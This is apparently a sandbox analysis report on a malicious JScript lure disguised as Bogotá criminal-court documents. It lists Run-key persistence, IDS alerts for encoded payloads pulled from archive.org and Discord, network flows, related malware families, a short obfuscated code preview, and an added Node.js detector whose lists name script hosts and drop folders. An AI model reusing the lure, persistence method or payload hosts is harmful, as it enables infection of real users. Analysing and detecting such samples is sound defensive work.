Sample name: Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winJS@9/3@5/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 31
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .js
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.29.183.29, 20.12.23.50, 20.242.39.171
• Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target MSBuild.exe, PID 5716 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7776 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:53:48 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\Users\Public\Downloads\fluctuous.js
01:53:56 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\Users\Public\Downloads\fluctuous.js
20:53:43 | API Interceptor | 44x Sleep call for process: powershell.exe modified
20:54:26 | API Interceptor | 2360997x Sleep call for process: MSBuild.exe modified
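Both autostart entries register C:\Users\Public\Downloads\fluctuous.js under the current user's Run key, which is the pattern behind the "New RUN Key Pointing to Suspicious Folder" Sigma hit in the signature list: a script, in a world-writable folder, started at logon through its file association (Windows Script Host for .js), with no executable named at all. As an added example that is not part of this report and not the Sigma rule's own logic, the Node.js snippet below parses `reg query` output for that key and flags values on three independent indicators: a path inside a common drop folder, a script extension, or an explicit script host on the command line. The registry text is constructed; only the fluctuous.js value mirrors the entry above, and the folder, extension and host lists are the example's own choice.

```javascript
"use strict";

// Constructed `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` output.
// Only the fluctuous.js value mirrors the autostart entry in this report; the other
// values are made up to exercise the checks. String.raw keeps the backslashes literal.
const SAMPLE_REG_QUERY = String.raw`
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    fluctuous    REG_SZ    C:\Users\Public\Downloads\fluctuous.js
    Helper    REG_SZ    wscript.exe //B "C:\Users\alice\AppData\Local\Temp\helper.vbs"
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
`;

// Indicator lists are this example's own choice (assumption), not the exact folder
// list of the Sigma rule. Comparisons are case-insensitive.
const DROP_FOLDERS = [
  "\\users\\public\\", "\\downloads\\", "\\appdata\\local\\temp\\", "\\windows\\temp\\",
  "\\programdata\\", "\\desktop\\", "\\$recycle.bin\\",
];
const SCRIPT_EXTENSIONS = [".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1"];
const SCRIPT_HOSTS = ["wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"];

// A `reg query` value line: <indent><name><spaces><REG_type><spaces><data>.
const VALUE_LINE = /^\s+(.+?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*?)\s*$/;

function parseRegQuery(text) {
  const values = [];
  for (const line of text.split(/\r?\n/)) {
    const m = VALUE_LINE.exec(line);
    if (m) values.push({ name: m[1], type: m[2], data: m[3] });
  }
  return values;
}

// Paths named in a Run value: quoted strings, plus unquoted tokens containing a
// backslash. A bare "C:\...\x.js" with no host is still launched: Explorer resolves
// the .js association to Windows Script Host.
function extractPaths(data) {
  const quoted = [...data.matchAll(/"([^"]+)"/g)].map((m) => m[1]);
  const unquoted = data
    .replace(/"[^"]*"/g, " ")
    .split(/\s+/)
    .filter((t) => /^[a-z%]/i.test(t) && t.includes("\\"));
  return [...quoted, ...unquoted];
}

// Independent indicators, so one match does not hide another in the output.
function auditRunValue(value) {
  const reasons = [];
  const paths = extractPaths(value.data).map((p) => p.toLowerCase());
  const lower = value.data.toLowerCase();
  if (paths.some((p) => DROP_FOLDERS.some((f) => p.includes(f)))) reasons.push("drop_folder");
  if (paths.some((p) => SCRIPT_EXTENSIONS.some((e) => p.endsWith(e)))) reasons.push("script_extension");
  if (SCRIPT_HOSTS.some((h) => lower.includes(h))) reasons.push("script_host");
  return reasons;
}

// Returns only the values that tripped at least one indicator.
function auditRunKeys(regQueryText) {
  return parseRegQuery(regQueryText)
    .map((v) => ({ ...v, reasons: auditRunValue(v) }))
    .filter((v) => v.reasons.length > 0);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const f of auditRunKeys(SAMPLE_REG_QUERY)) {
    console.log(`${f.name}: ${f.data}  [${f.reasons.join(", ")}]`);
  }
}
```

Run it against `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` piped to a file, or against the Sysmon Event ID 13 details of the same key; the OneDrive and SecurityHealth values pass because AppData\Local alone is not treated as a drop folder, so only a path like AppData\Local\Temp is flagged.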
Match | Associated Sample Name / URL | Detection | Threat Name | Context
207.241.233.30 | Trasferire.VBS.vbs | malicious | Snake Keylogger, VIP Keylogger | -
207.241.233.30 | NEW ORDER.js | malicious | XWorm | -
207.241.233.30 | imagen Art#U00edculos DRUCK MAQUINARIA, S.L..js | malicious | XWorm | -
207.241.233.30 | Kir#U00e1ly Gizella T#U00e9telrendel#U00e9s.VBS.vbs | malicious | XWorm | -
207.241.233.30 | pleaseviewstampedimageandconfirmourorder_Doc12234567754_678787899 pdf.js | malicious | Remcos | -
207.241.233.30 | inquiry for chemical supply-RFQ-0982240.js | malicious | FormBook | -
207.241.233.30 | inquiry for chemical supply-RFQ-0982240.js | malicious | FormBook | -
207.241.233.30 | Maker Srl - Nuovo ordine.js | malicious | XWorm | -
207.241.233.30 | https://www.mediafire.com/file_premium/862bjkucj0uc79f/69149366_pdf.lzh/file | malicious | Snake Keylogger, VIP Keylogger | -
207.241.233.30 | Documento.js | malicious | AsyncRAT, PureLog Stealer | -
207.241.224.2 | http://web.archive.org/web/20220923183800/https://londonsuccessuniversity.com/favicon.ico | malicious | Unknown | archive.org/includes/build/js/archive.min.js?v=32fa782e
162.159.134.233 | Cheat.Lab.2.7.1.msi | malicious | RedLine | cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
162.159.134.233 | http://162.159.134.233:443 | malicious | Unknown | 162.159.134.233:443/
162.159.134.233 | PO - Drawings And Specifications Sheet_pdf.scr.exe | malicious | AveMaria | cdn.discordapp.com/attachments/472051232014598144/935778066171580456/Sjddks44.jpg
Match | Associated Sample Name / URL | Detection | Threat Name | Context
cdn.discordapp.com | DiscordTokenLogin.exe | malicious | TroubleGrabber | 162.159.135.233
cdn.discordapp.com | DiscordTokenLogin.exe | malicious | TroubleGrabber | 162.159.130.233
cdn.discordapp.com | NatchoPremium.exe | malicious | Unknown | 162.159.134.233
cdn.discordapp.com | NatchoPremium.exe | malicious | Unknown | 162.159.134.233
cdn.discordapp.com | NATCHO CHEAT.exe | malicious | Unknown | 162.159.135.233
cdn.discordapp.com | NATCHO CHEAT.exe | malicious | Unknown | 162.159.133.233
cdn.discordapp.com | hzluQdk9nk.exe | malicious | Unknown | 162.159.135.233
cdn.discordapp.com | hzluQdk9nk.exe | malicious | Unknown | 162.159.135.233
cdn.discordapp.com | Order No. 20250407-70611.vbs | malicious | Unknown | 162.159.129.233
cdn.discordapp.com | Order No. 20250407-70611.vbs | malicious | Unknown | 162.159.133.233
archive.org | Trasferire.VBS.vbs | malicious | Snake Keylogger, VIP Keylogger | 207.241.233.30
archive.org | NEW ORDER.js | malicious | XWorm | 207.241.233.30
archive.org | Update.vbs | malicious | Unknown | 207.241.224.2
archive.org | imagen Art#U00edculos DRUCK MAQUINARIA, S.L..js | malicious | XWorm | 207.241.233.30
archive.org | Art#U00edculos enumerados.js | malicious | Unknown | 207.241.227.90
archive.org | Kir#U00e1ly Gizella T#U00e9telrendel#U00e9s.VBS.vbs | malicious | XWorm | 207.241.233.30
archive.org | pleaseviewstampedimageandconfirmourorder_Doc12234567754_678787899 pdf.js | malicious | Remcos | 207.241.233.30
archive.org | inquiry for chemical supply-RFQ-0982240.js | malicious | FormBook | 207.241.233.30
archive.org | inquiry for chemical supply-RFQ-0982240.js | malicious | FormBook | 207.241.233.30
archive.org | LEGAL-INVOICES.js | malicious | FormBook | 207.241.227.90
ia801700.us.archive.org | Trasferire.VBS.vbs | malicious | Snake Keylogger, VIP Keylogger | 207.241.233.30
ia801700.us.archive.org | NEW ORDER.js | malicious | XWorm | 207.241.233.30
ia801700.us.archive.org | imagen Art#U00edculos DRUCK MAQUINARIA, S.L..js | malicious | XWorm | 207.241.233.30
ia801700.us.archive.org | Kir#U00e1ly Gizella T#U00e9telrendel#U00e9s.VBS.vbs | malicious | XWorm | 207.241.233.30
ia801700.us.archive.org | pleaseviewstampedimageandconfirmourorder_Doc12234567754_678787899 pdf.js | malicious | Remcos | 207.241.233.30
ia801700.us.archive.org | inquiry for chemical supply-RFQ-0982240.js | malicious | FormBook | 207.241.233.30
ia801700.us.archive.org | inquiry for chemical supply-RFQ-0982240.js | malicious | FormBook | 207.241.233.30
ia801700.us.archive.org | Maker Srl - Nuovo ordine.js | malicious | XWorm | 207.241.233.30
ia801700.us.archive.org | https://www.mediafire.com/file_premium/862bjkucj0uc79f/69149366_pdf.lzh/file | malicious | Snake Keylogger, VIP Keylogger | 207.241.233.30
ia801700.us.archive.org | Documento.js | malicious | AsyncRAT, PureLog Stealer | 207.241.233.30
Match | Associated Sample Name / URL | Detection | Threat Name | Context
INTERNET-ARCHIVEUS | Trasferire.VBS.vbs | malicious | Snake Keylogger, VIP Keylogger | 207.241.224.2
INTERNET-ARCHIVEUS | NEW ORDER.js | malicious | XWorm | 207.241.224.2
INTERNET-ARCHIVEUS | Update.vbs | malicious | Unknown | 207.241.224.2
INTERNET-ARCHIVEUS | imagen Art#U00edculos DRUCK MAQUINARIA, S.L..js | malicious | XWorm | 207.241.224.2
INTERNET-ARCHIVEUS | Art#U00edculos enumerados.js | malicious | Unknown | 207.241.224.2
INTERNET-ARCHIVEUS | Kir#U00e1ly Gizella T#U00e9telrendel#U00e9s.VBS.vbs | malicious | XWorm | 207.241.224.2
INTERNET-ARCHIVEUS | pleaseviewstampedimageandconfirmourorder_Doc12234567754_678787899 pdf.js | malicious | Remcos | 207.241.224.2
INTERNET-ARCHIVEUS | inquiry for chemical supply-RFQ-0982240.js | malicious | FormBook | 207.241.224.2
INTERNET-ARCHIVEUS | inquiry for chemical supply-RFQ-0982240.js | malicious | FormBook | 207.241.224.2
INTERNET-ARCHIVEUS | LEGAL-INVOICES.js | malicious | FormBook | 207.241.227.90
INTERNET-ARCHIVEUS | Trasferire.VBS.vbs | malicious | Snake Keylogger, VIP Keylogger | 207.241.224.2
INTERNET-ARCHIVEUS | NEW ORDER.js | malicious | XWorm | 207.241.224.2
INTERNET-ARCHIVEUS | Update.vbs | malicious | Unknown | 207.241.224.2
INTERNET-ARCHIVEUS | imagen Art#U00edculos DRUCK MAQUINARIA, S.L..js | malicious | XWorm | 207.241.224.2
INTERNET-ARCHIVEUS | Art#U00edculos enumerados.js | malicious | Unknown | 207.241.224.2
INTERNET-ARCHIVEUS | Kir#U00e1ly Gizella T#U00e9telrendel#U00e9s.VBS.vbs | malicious | XWorm | 207.241.224.2
INTERNET-ARCHIVEUS | pleaseviewstampedimageandconfirmourorder_Doc12234567754_678787899 pdf.js | malicious | Remcos | 207.241.224.2
INTERNET-ARCHIVEUS | inquiry for chemical supply-RFQ-0982240.js | malicious | FormBook | 207.241.224.2
INTERNET-ARCHIVEUS | inquiry for chemical supply-RFQ-0982240.js | malicious | FormBook | 207.241.224.2
INTERNET-ARCHIVEUS | LEGAL-INVOICES.js | malicious | FormBook | 207.241.227.90
CLOUDFLARENETUS | Luma_Crypt_Packlab.exe | malicious | LummaC Stealer | 104.21.85.126
CLOUDFLARENETUS | https://panel-aol-setting.wagnercode.com/?yvyahmdk&qrc=bsklar71@aol.com | malicious | Unknown | 104.18.95.41
CLOUDFLARENETUS | https://panel-aol-setting.wagnercode.com/?yvyahmdk&qrc=bsklar71@aol.com | malicious | Unknown | 104.18.95.41
CLOUDFLARENETUS | https://panel-aol-setting.wagnercode.com/?yvyahmdk&qrc=bsklar71@aol.com | malicious | Unknown | 104.18.95.41
CLOUDFLARENETUS | script.exe | malicious | LummaC Stealer | 104.21.85.126
CLOUDFLARENETUS | https://bit.ly/3WzcrWS | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | https://deareports.online/?p=1444 | malicious | Unknown | 104.21.73.203
CLOUDFLARENETUS | https://bit.ly/3WzcrWS | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | EvidencePayment bf990558965ec85e92da4fa1f7693009329e71ec88ae4615bbc36ab6ce41109e.htm.html | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 104.17.25.14
CLOUDFLARENETUS | https://680beb5d59eaab530917c14f.su2.highspot-page.com/1-1/WyI2ODBiZWI1ZDU5ZWFhYjUzMDkxN2MxNGYiLCJmYi5jb20vOGViOGI3NzVkZjc5NGYzOTI5ZjY2OWJmNzBjNmNkYWM1MTFmOWQzNS9zaXRlIiwiZmIuY29tIiwiMjAyNS0wNC0yNVQyMDowNzowOC4wMTc3NjlaIl0=--5b0d2dd533659145ab8a62bbbb69590e07feca9c/loading.html | malicious | Phisher | 104.26.4.15
TENET-1ZA | mqml.elf | malicious | Mirai | 137.214.166.172
TENET-1ZA | k3.elf | malicious | Unknown | 146.141.31.200
TENET-1ZA | sora.arm7.elf | malicious | Mirai | 155.232.149.250
TENET-1ZA | sora.mips.elf | malicious | Mirai | 146.236.61.209
TENET-1ZA | x32.elf | malicious | Mirai | 143.136.105.26
TENET-1ZA | hotnet.mpsl.elf | malicious | Mirai, Okiru | 154.114.245.12
TENET-1ZA | meihao.m68k.elf | malicious | Mirai | 152.116.173.84
TENET-1ZA | nemil.mips.elf | malicious | Mirai | 146.68.100.137
TENET-1ZA | xd.arm.elf | malicious | Mirai | 146.236.61.238
TENET-1ZA | mips.elf | malicious | Mirai | 146.239.67.85
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | tall.exe | malicious | XWorm | 207.241.233.30, 207.241.224.2, 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | XClient(1).exe | malicious | XWorm | 207.241.233.30, 207.241.224.2, 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | fuckoff.exe | malicious | XWorm | 207.241.233.30, 207.241.224.2, 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | fuckyou.exe | malicious | XWorm | 207.241.233.30, 207.241.224.2, 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | XClient.exe | malicious | AsyncRAT, XWorm | 207.241.233.30, 207.241.224.2, 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | Output.exe | malicious | XWorm | 207.241.233.30, 207.241.224.2, 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | sLoM.exe | malicious | XWorm | 207.241.233.30, 207.241.224.2, 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | test.exe | malicious | XWorm | 207.241.233.30, 207.241.224.2, 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | PO_66360_xlsx.js | malicious | Remcos | 207.241.233.30, 207.241.224.2, 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | PO_66360_Website_Products_xlsx.js | malicious | Remcos | 207.241.233.30, 207.241.224.2, 162.159.134.233
                                                                                No context
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):64
                                                                                Entropy (8bit):1.1940658735648508
                                                                                Encrypted:false
                                                                                SSDEEP:3:Nlllulbnolz:NllUc
                                                                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:@...e................................................@..........
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                File type:ASCII text, with very long lines (308), with CRLF line terminators
                                                                                Entropy (8bit):4.983585549506088
                                                                                TrID:
                                                                                  File name:Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js
                                                                                  File size:1'477'831 bytes
                                                                                  MD5:55b953145f20e1f6b1f7e7f5741bacec
                                                                                  SHA1:b2e741db6c57f558d4d212c1f64ecec062ea4004
                                                                                  SHA256:a6dba67aae8b3be407bfb4149fca24d9909ae671640121ecd1b9dc9d9f9ee976
                                                                                  SHA512:81f58e904873261ca3836ee8004966b39168bba688e1d75d2e253812380fdc44b81bf8ceb52bc38731efa4be97a964a279c8495041f77331814907cca1b1003b
                                                                                  SSDEEP:768:G7+7+7+7+7+7+7+7+7+7+B7+7+7+7+7+7+7+7+7+7+B7+7+7+7+7+7+7+7+7+7+o:1
                                                                                  TLSH:F165155EA3471C70F8E741986CBD2C5108EC4DE226E7734EDB3A95A93E18279D2D313A
                                                                                  File Content Preview:..var crowberries = ([]+[ ([]["destain"]+[])[0] + ([]["Trimble"]+[])[1] + ([]["inequalities"]+[])[2] + ([]["turmaline"]+[])[3] + ([]["Castiglione"]+[])[4] + ([]["Tagamet"]+[])[5] + ([]["mareographic"]+[])[6] + ([]["TrimbleMap"]+[])[7] + ([]["ludicrous"]+
                                                                                  Icon Hash:68d69b8bb6aa9a86


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-04-26T02:53:48.006563+0200 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 207.241.233.30 | 443 | 192.168.2.4 | 49720 | TCP
2025-04-26T02:53:50.051922+0200 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 162.159.134.233 | 443 | 192.168.2.4 | 49723 | TCP
2025-04-26T02:53:50.197242+0200 | 2057635 | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound | 1 | 162.159.134.233 | 443 | 192.168.2.4 | 49723 | TCP
2025-04-26T02:53:50.197242+0200 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 162.159.134.233 | 443 | 192.168.2.4 | 49723 | TCP
                                                                                  • Total Packets: 555
                                                                                  • 3030 undefined
                                                                                  • 443 (HTTPS)
                                                                                  • 80 (HTTP)
                                                                                  • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 26, 2025 02:53:30.280580997 CEST | 49681 | 80 | 192.168.2.4 | 2.17.190.73
Apr 26, 2025 02:53:32.061851978 CEST | 49680 | 443 | 192.168.2.4 | 204.79.197.222
Apr 26, 2025 02:53:39.280817032 CEST | 49671 | 443 | 192.168.2.4 | 204.79.197.203
Apr 26, 2025 02:53:39.593013048 CEST | 49671 | 443 | 192.168.2.4 | 204.79.197.203
Apr 26, 2025 02:53:39.889883995 CEST | 49681 | 80 | 192.168.2.4 | 2.17.190.73
Apr 26, 2025 02:53:40.202421904 CEST | 49671 | 443 | 192.168.2.4 | 204.79.197.203
Apr 26, 2025 02:53:41.405517101 CEST | 49671 | 443 | 192.168.2.4 | 204.79.197.203
Apr 26, 2025 02:53:41.671117067 CEST | 49680 | 443 | 192.168.2.4 | 204.79.197.222
Apr 26, 2025 02:53:43.811765909 CEST | 49671 | 443 | 192.168.2.4 | 204.79.197.203
Apr 26, 2025 02:53:45.351686954 CEST | 49719 | 443 | 192.168.2.4 | 207.241.224.2
Apr 26, 2025 02:53:45.351732969 CEST | 443 | 49719 | 207.241.224.2 | 192.168.2.4
Apr 26, 2025 02:53:45.351820946 CEST | 49719 | 443 | 192.168.2.4 | 207.241.224.2
Apr 26, 2025 02:53:45.362004042 CEST | 49719 | 443 | 192.168.2.4 | 207.241.224.2
Apr 26, 2025 02:53:45.362035036 CEST | 443 | 49719 | 207.241.224.2 | 192.168.2.4
Apr 26, 2025 02:53:45.691431046 CEST | 443 | 49719 | 207.241.224.2 | 192.168.2.4
Apr 26, 2025 02:53:45.691523075 CEST | 49719 | 443 | 192.168.2.4 | 207.241.224.2
Apr 26, 2025 02:53:45.714967966 CEST | 49719 | 443 | 192.168.2.4 | 207.241.224.2
Apr 26, 2025 02:53:45.714989901 CEST | 443 | 49719 | 207.241.224.2 | 192.168.2.4
Apr 26, 2025 02:53:45.715234995 CEST | 443 | 49719 | 207.241.224.2 | 192.168.2.4
Apr 26, 2025 02:53:45.732705116 CEST | 49719 | 443 | 192.168.2.4 | 207.241.224.2
Apr 26, 2025 02:53:45.780275106 CEST | 443 | 49719 | 207.241.224.2 | 192.168.2.4
Apr 26, 2025 02:53:46.042496920 CEST | 443 | 49719 | 207.241.224.2 | 192.168.2.4
Apr 26, 2025 02:53:46.042557955 CEST | 49719 | 443 | 192.168.2.4 | 207.241.224.2
Apr 26, 2025 02:53:46.042581081 CEST | 443 | 49719 | 207.241.224.2 | 192.168.2.4
Apr 26, 2025 02:53:46.042804003 CEST | 443 | 49719 | 207.241.224.2 | 192.168.2.4
Apr 26, 2025 02:53:46.042846918 CEST | 49719 | 443 | 192.168.2.4 | 207.241.224.2
Apr 26, 2025 02:53:46.045727968 CEST | 49719 | 443 | 192.168.2.4 | 207.241.224.2
Apr 26, 2025 02:53:46.220587969 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:46.220634937 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:46.220710993 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:46.221008062 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:46.221019983 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:46.551812887 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:46.551878929 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:46.555027008 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:46.555038929 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:46.555247068 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:46.556112051 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:46.600266933 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.031160116 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.031183958 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.031198978 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.031248093 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.031269073 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.031312943 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.031342983 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.031368017 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.031399965 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.031408072 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.031428099 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.031455994 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.192166090 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.192188025 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.192234993 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.192245007 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.192281961 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.192329884 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.192347050 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.192384958 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.192390919 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.192400932 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.192433119 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.192600012 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.192615032 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.192665100 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.192677021 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.192707062 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.193252087 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.193270922 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.193300962 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.193305969 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.193329096 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.193352938 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.353872061 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.353895903 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.353974104 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.353986025 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.353996038 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.354013920 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
Apr 26, 2025 02:53:47.354444981 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.354460955 CEST | 443 | 49720 | 207.241.233.30 | 192.168.2.4
Apr 26, 2025 02:53:47.354526043 CEST | 49720 | 443 | 192.168.2.4 | 207.241.233.30
